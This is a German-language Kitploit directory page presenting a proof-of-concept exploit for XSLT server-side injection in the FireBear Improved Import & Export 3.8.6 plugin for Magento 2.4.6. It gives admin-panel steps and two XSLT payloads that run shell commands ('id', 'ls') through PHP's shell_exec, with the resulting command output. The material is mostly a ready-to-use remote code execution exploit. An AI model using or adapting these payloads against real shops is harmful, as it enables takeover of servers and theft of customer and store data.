Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Magento-ver.-2.4.6 — Magento ver. 2.4.6 - XSLT Server Side Injection | Kitploit
Tools/GitHubGitHub/capture0x/magento-ver.-2.4.6
Vulnerability AnalysisExploitationWeb Application ExploitationPayload Development
GitHubcapture0x/magento-ver.-2.4.6

Magento-ver.-2.4.6

Magento ver. 2.4.6 - XSLT Server Side Injection

Repository anzeigen
4vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit-Titel: FireBear Studio Improved Import & Export ver. 3.8.6 für Magento 2.4.6 - XSLT-Serverseitige Injektion

  • Datum: 2023-11-17
  • Exploit-Autor: tmrswrr
  • Hersteller-Homepage: FireBear Studio
  • Software-Link: FireBear Studio Improved Import & Export
  • Version: FireBear Improved Import & Export ver. 3.8.6
Magento-Bild Magento-Bild ## POC
  1. Melden Sie sich mit Admin-Zugangsdaten unter dieser URL an: https://magento2demo.firebearstudio.com/

  2. Klicken Sie auf SYSTEM > Import Jobs > Entity Type Widget > click edit

  3. Wählen Sie Importdateityp > XML > Importquelle ist Datei

  4. Laden Sie eine beliebige XML-Datei hoch.

  5. Klicken Sie auf XSLT Configuration und schreiben Sie dieses Payload:

    root@kitploit:~
    <?xml version="1.0" encoding="utf-8"?>
    <xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:php="http://php.net/xsl">
      <xsl:template match="/">
        <xsl:value-of select="php:function('shell_exec','id')" />
      </xsl:template>
    </xsl:stylesheet>```
    

** **uid=10095(a0563af8) gid=1050(a0563af8) groups=1050(a0563af8)

root@kitploit:~
   <?xml version="1.0" encoding="utf-8"?>
   <xsl:stylesheet version="1.0"
   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
   xmlns:php="http://php.net/xsl">
     <xsl:template match="/">
       <xsl:value-of select="php:function('shell_exec','ls')" />
     </xsl:template>
   </xsl:stylesheet>```

**<?xml version="1.0"?>
cron.php
errors
get.php
health_check.php
index.php
media
opt
robots.txt
static
static.php
Tool herunterladen